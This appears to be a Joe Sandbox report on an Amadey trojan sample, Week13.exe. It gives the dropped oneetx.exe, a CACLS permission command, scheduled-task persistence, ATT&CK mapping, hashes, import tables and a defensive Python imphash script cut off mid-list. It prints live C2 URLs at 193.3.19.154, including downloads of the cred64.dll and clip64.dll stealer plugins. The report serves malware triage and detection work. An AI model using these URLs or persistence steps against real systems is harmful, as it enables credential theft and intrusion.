Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb7ae701b3" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4482643286.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: oneetx.exe PID: 6160, type: MEMORYSTR
Source: Yara match | File source: Week13.exe, type: SAMPLE
Source: Yara match | File source: 00000000.00000000.2018110902.0000000000611000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000000.2659622976.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2024090733.0000000000611000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.3258747374.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2072680147.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2661827573.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.3859111470.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4482407558.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.3858755574.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.4459397310.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.2023252824.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4464203230.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3259452857.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.2068747205.0000000000891000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; a number in front of a technique is the count of matched signatures for that technique):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts
Execution: 1 Scheduled Task/Job | Scheduled Task/Job | At | Cron | Launchd
Persistence: 1 Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Services File Permissions Weakness | 1 DLL Side-Loading | Network Logon Script
Privilege Escalation: 11 Process Injection | 1 Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Services File Permissions Weakness | 1 DLL Side-Loading
Defense Evasion: 1 Masquerading | 21 Virtualization/Sandbox Evasion | 11 Process Injection | 1 Services File Permissions Weakness | 1 DLL Side-Loading
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets
Discovery: 11 Security Software Discovery | 21 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 File and Directory Discovery | 12 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH
Collection: Data from Local System | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging
Command and Control: 1 Ingress Tool Transfer | 2 Non-Application Layer Protocol | 12 Application Layer Protocol | Protocol Impersonation | Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact
Behavior Graph ID: 1561581 | Sample: Week13.exe | Start date: 23/11/2024 | Architecture: WINDOWS | Score: 100

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 7 other signatures
Started at the root: Week13.exe; oneetx.exe (twice); 3 other processes
Week13.exe -> dropped C:\Users\user\AppData\Local\...\oneetx.exe (PE32) and C:\Users\user\...\oneetx.exe:Zone.Identifier (ASCII) -> started oneetx.exe
oneetx.exe -> contacted 193.3.19.154 (ports 49704, 49705, 49706; ARNES-NETAcademicandResearchNetworkofSloveniaSI, Denmark)
oneetx.exe signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; 2 other signatures
oneetx.exe -> started cmd.exe and schtasks.exe
cmd.exe -> started conhost.exe, cmd.exe, cacls.exe and 4 other processes
schtasks.exe -> started conhost.exe

Antivirus detection, sample (Source | Detection | Scanner | Label):
Week13.exe | 92% | ReversingLabs | Win32.Trojan.Amadey
Week13.exe | 100% | Avira | HEUR/AGEN.1317762
Week13.exe | 100% | Joe Sandbox ML
Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | 100% | Avira | HEUR/AGEN.1317762
C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | 92% | ReversingLabs | Win32.Trojan.Amadey
No Antivirus matches
No Antivirus matches
Antivirus detection, URLs (Source | Detection | Scanner | Label):
http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=N | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.phpc | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.phpd | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.phppdR | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.phppd | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.phpe5a2ab05 | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.php | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/Plugins/cred64.dllx | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/Plugins/cred64.dll | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ= | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/Plugins/clip64.dllYS2 | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.phpt | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/index.phpded | 100% | Avira URL Cloud | malware
http://193.3.19.154/store/games/Plugins/clip64.dll | 100% | Avira URL Cloud | malware
No contacted domains info
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://193.3.19.154/store/games/index.php | true | Avira URL Cloud: malware | unknown
URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation):
http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=N | oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.phpe5a2ab05 | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/Plugins/cred64.dllx | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/Plugins/cred64.dll | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.phppd | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.phpc | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ= | oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.phpd | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.phppdR | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/Plugins/clip64.dllYS2 | oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.phpded | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/Plugins/clip64.dll | oneetx.exe, 00000001.00000002.4482643286.0000000000D21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://193.3.19.154/store/games/index.phpt | oneetx.exe, 00000001.00000002.4482643286.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
193.3.19.154 | unknown | Denmark | 2107 | ARNES-NETAcademicandResearchNetworkofSloveniaSI | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561581
Start date and time: 2024-11-23 20:52:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Week13.exe
Detection: MAL
Classification: mal100.troj.spyw.winEXE@26/6@0/1
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Week13.exe
Time | Type | Description
14:52:58 | API Interceptor | 10376866x Sleep call for process: oneetx.exe modified
20:52:57 | Task Scheduler | Run new task: oneetx.exe path: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.3.19.154 | HRU6b08mmd.exe | malicious | Amadey, Healer AV Disabler, PureLog Stealer, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | V4D7O37Q2C.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | TEpJB9Z7uL.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | hd6tZze1Cp.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | yab5PS1Mst.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | JeGitbTYgL.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | file.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | file.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
193.3.19.154 | file.exe | malicious | Amadey, RedLine | 193.3.19.154/store/games/index.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ARNES-NET (Academic and Research Network of Slovenia, SI) | 1Sj5F6P4nv.exe | malicious | CredGrabber, Meduza Stealer | 193.3.19.151
ARNES-NET (Academic and Research Network of Slovenia, SI) | 5LEXIucyEP.exe | malicious | CredGrabber, Meduza Stealer | 193.3.19.151
ARNES-NET (Academic and Research Network of Slovenia, SI) | 44qLDKzsfO.exe | malicious | CredGrabber, Meduza Stealer | 193.3.19.151
ARNES-NET (Academic and Research Network of Slovenia, SI) | gP5rh6fa0S.exe | malicious | CredGrabber, Meduza Stealer | 193.3.19.151
ARNES-NET (Academic and Research Network of Slovenia, SI) | urkOkB0BdX.exe | malicious | CredGrabber, Meduza Stealer | 193.3.19.151
ARNES-NET (Academic and Research Network of Slovenia, SI) | 8F0oMWUhg7.exe | malicious | CredGrabber, Meduza Stealer | 193.3.19.151
ARNES-NET (Academic and Research Network of Slovenia, SI) | botx.mpsl.elf | malicious | Mirai | 95.87.151.60
ARNES-NET (Academic and Research Network of Slovenia, SI) | yakuza.mips.elf | malicious | Unknown | 194.249.92.194
ARNES-NET (Academic and Research Network of Slovenia, SI) | HRU6b08mmd.exe | malicious | Amadey, Healer AV Disabler, PureLog Stealer, RedLine | 193.3.19.154
                  Process:C:\Users\user\Desktop\Week13.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):209950
                  Entropy (8bit):6.342521487985493
                  Encrypted:false
                  SSDEEP:3072:c/frTDzurT1S3CzpdmnATE55zjExkKGruONMvhu5QTXzeJX2vkMfSDPwU:Wfrnzurs3Czpexj2kGOIu5QTyJMKk
                  MD5:A1B8FA53A47B1991EE76A46EE8685B7D
                  SHA1:4002A9CFFCDE9F7F44633457457792564A63BF5D
                  SHA-256:E472FD69B5A891059F44206124BAF829CB7583890E2C8E288E311359A2249871
                  SHA-512:F685FEF174DED44E2ECA9DF2F75F858611B45672E4DE5D81C868BB7441F476BC20AB8421AE48E2D004B960672C35190C2F4F6B9975A67596DE204918C6E52613
                  Malicious:true
                  Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 92%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L.....Bd.................t........../U............@.......................................@.....................................d....@.......................P... ..`...p...................t...........@............................................text...-r.......t.................. ..`.rdata..t|.......~...x..............@..@.data...('..........................@....rsrc........@......................@..@.reloc... ...P..."..................@..B........................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\Week13.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
Preview:[ZoneTransfer]....ZoneId=0
Note: this 26-byte file is the body of a Zone.Identifier alternate data stream. ZoneId=0 is the Local Machine zone, so a file carrying it has no Mark of the Web; the report lists the stream as modified (not created) by Week13.exe.
                  Process:C:\Windows\SysWOW64\cacls.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):15
                  Entropy (8bit):3.240223928941852
                  Encrypted:false
                  SSDEEP:3:o3F:o1
                  MD5:509B054634B6DE74F111C3E646BC80FD
                  SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                  SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                  SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                  Malicious:false
                  Preview:processed dir:
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.342521487985493
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Week13.exe
                  File size:209'950 bytes
                  MD5:a1b8fa53a47b1991ee76a46ee8685b7d
                  SHA1:4002a9cffcde9f7f44633457457792564a63bf5d
                  SHA256:e472fd69b5a891059f44206124baf829cb7583890e2c8e288e311359a2249871
                  SHA512:f685fef174ded44e2eca9df2f75f858611b45672e4de5d81c868bb7441f476bc20ab8421ae48e2d004b960672c35190c2f4f6b9975a67596de204918c6e52613
                  SSDEEP:3072:c/frTDzurT1S3CzpdmnATE55zjExkKGruONMvhu5QTXzeJX2vkMfSDPwU:Wfrnzurs3Czpexj2kGOIu5QTyJMKk
                  TLSH:F524F6257D12C032D561A1B619F5BFF2C59CA828A7B049DB7B800F77DA122F73960E39
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o.................
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0x41552f
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6442E0B0 [Fri Apr 21 19:14:56 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:f8cc61ade86cb7277d0ab974de6323cb
Instruction (linear disassembly from the entrypoint at 0x41552f)
Note: the entrypoint is the MSVC CRT startup stub (a call followed by a tail jmp into the CRT's common main). The disassembler then runs linearly into the adjacent CRT function, the /GS stack-cookie failure handler, recognisable by push 17h / call IsProcessorFeaturePresent / int 29h (fast-fail) and the zeroing of a 0x2CC-byte CONTEXT record before the register capture. This is compiler runtime code, not sample-specific logic.
                  call 00007F4174B0CD79h
                  jmp 00007F4174B0C769h
                  jmp 00007F4174B0F8B9h
                  push ebp
                  mov ebp, esp
                  sub esp, 00000324h
                  push ebx
                  push 00000017h
                  call 00007F4174B1B8C9h
                  test eax, eax
                  je 00007F4174B0C8F7h
                  mov ecx, dword ptr [ebp+08h]
                  int 29h
                  push 00000003h
                  call 00007F4174B0CA9Bh
                  mov dword ptr [esp], 000002CCh
                  lea eax, dword ptr [ebp-00000324h]
                  push 00000000h
                  push eax
                  call 00007F4174B0D241h
                  add esp, 0Ch
                  mov dword ptr [ebp-00000274h], eax
                  mov dword ptr [ebp-00000278h], ecx
                  mov dword ptr [ebp-0000027Ch], edx
                  mov dword ptr [ebp-00000280h], ebx
                  mov dword ptr [ebp-00000284h], esi
                  mov dword ptr [ebp-00000288h], edi
                  mov word ptr [ebp-0000025Ch], ss
                  mov word ptr [ebp-00000268h], cs
                  mov word ptr [ebp-0000028Ch], ds
                  mov word ptr [ebp-00000290h], es
                  mov word ptr [ebp-00000294h], fs
                  mov word ptr [ebp-00000298h], gs
                  pushfd
                  pop dword ptr [ebp-00000264h]
                  mov eax, dword ptr [ebp+04h]
                  mov dword ptr [ebp-0000026Ch], eax
                  lea eax, dword ptr [ebp+04h]
                  mov dword ptr [ebp-00000260h], eax
                  mov dword ptr [ebp-00000324h], 00010001h
                  mov eax, dword ptr [eax-04h]
                  push 00000050h
                  mov dword ptr [ebp-00000270h], eax
                  lea eax, dword ptr [ebp-58h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x300d8 | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x35000 | 0x208c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2f360 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2f474 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2f3d0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x29000 | 0x204 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2722d | 0x27400 | f8a1f275d950abfb13b70d936b801360 | False | 0.4442426353503185 | data | 6.4362141478020645 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x29000 | 0x7c74 | 0x7e00 | a9c9e415c77aeb6ff53c4ca6792ae320 | False | 0.4195808531746032 | data | 4.991773718102028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x31000 | 0x2728 | 0x1800 | 214e19b3a3a6d8354fa90e8a17cf746e | False | 0.08658854166666667 | data | 1.3673078527283469 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x34000 | 0x1e0 | 0x200 | 1b99276507c6356b24a31f63887375df | False | 0.52734375 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x35000 | 0x208c | 0x2200 | 1f9afe88c86e7b78ae326a57253f65d5 | False | 0.7651654411764706 | data | 6.522595049005223 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x34060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | GetFileAttributesA, CreateFileA, CloseHandle, GetSystemInfo, CreateThread, HeapAlloc, GetThreadContext, GetProcAddress, VirtualAllocEx, LocalFree, GetLastError, ReadProcessMemory, GetProcessHeap, CreateProcessA, CreateDirectoryA, SetThreadContext, WriteConsoleW, ReadConsoleW, SetEndOfFile, SetFilePointerEx, GetTempPathA, Sleep, SetCurrentDirectoryA, GetModuleHandleA, GetComputerNameExW, ResumeThread, GetVersionExW, CreateMutexA, VirtualAlloc, WriteFile, VirtualFree, HeapFree, WriteProcessMemory, GetModuleFileNameA, RemoveDirectoryA, ReadFile, HeapReAlloc, HeapSize, GetTimeZoneInformation, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetStringTypeW, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, LCMapStringW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RaiseException, SetLastError, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, CompareStringW, DecodePointer
ADVAPI32.dll | RegCloseKey, RegQueryValueExA, GetUserNameA, RegSetValueExA, RegOpenKeyExA, ConvertSidToStringSidW, GetUserNameW, LookupAccountNameW
SHELL32.dll | SHGetFolderPathA, ShellExecuteA, SHFileOperationA
WININET.dll | HttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, InternetOpenW, InternetOpenUrlA
Language of compilation system | Country where language is spoken
English | United States
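Added example (not part of the Joe Sandbox report and not Joe Sandbox code): the import table above replayed through a pefile-style import hash and a capability-cluster check, the two things a triage analyst does with an import list. The API names are transcribed from the table; it is an assumption that the printed order is the on-disk import-directory order, so the computed value is only expected to equal the report's f8cc61ade86cb7277d0ab974de6323cb if that holds. The cluster definitions and coverage threshold are the example's own.

```python
"""Static triage of the import table: recompute the imphash (as pefile's
get_imphash() defines it) and flag API clusters behind the observed behaviour."""
import hashlib

# Transcribed from the report's DLL/Import table, in the order printed there.
# Assumption: that order is the import-directory order pefile hashes in.
REPORT_IMPORTS = [
    ("KERNEL32.dll", (
        "GetFileAttributesA, CreateFileA, CloseHandle, GetSystemInfo, CreateThread, HeapAlloc, "
        "GetThreadContext, GetProcAddress, VirtualAllocEx, LocalFree, GetLastError, ReadProcessMemory, "
        "GetProcessHeap, CreateProcessA, CreateDirectoryA, SetThreadContext, WriteConsoleW, ReadConsoleW, "
        "SetEndOfFile, SetFilePointerEx, GetTempPathA, Sleep, SetCurrentDirectoryA, GetModuleHandleA, "
        "GetComputerNameExW, ResumeThread, GetVersionExW, CreateMutexA, VirtualAlloc, WriteFile, VirtualFree, "
        "HeapFree, WriteProcessMemory, GetModuleFileNameA, RemoveDirectoryA, ReadFile, HeapReAlloc, HeapSize, "
        "GetTimeZoneInformation, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetStringTypeW, "
        "SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, "
        "GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetStdHandle, "
        "GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, LCMapStringW, EnterCriticalSection, "
        "LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, "
        "WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, UnhandledExceptionFilter, "
        "SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, "
        "IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, "
        "GetSystemTimeAsFileTime, InitializeSListHead, RaiseException, SetLastError, RtlUnwind, TlsAlloc, "
        "TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, "
        "CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, "
        "SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetModuleFileNameW, GetStdHandle, "
        "GetCommandLineA, GetCommandLineW, MultiByteToWideChar, CompareStringW, DecodePointer"
    ).split(", ")),
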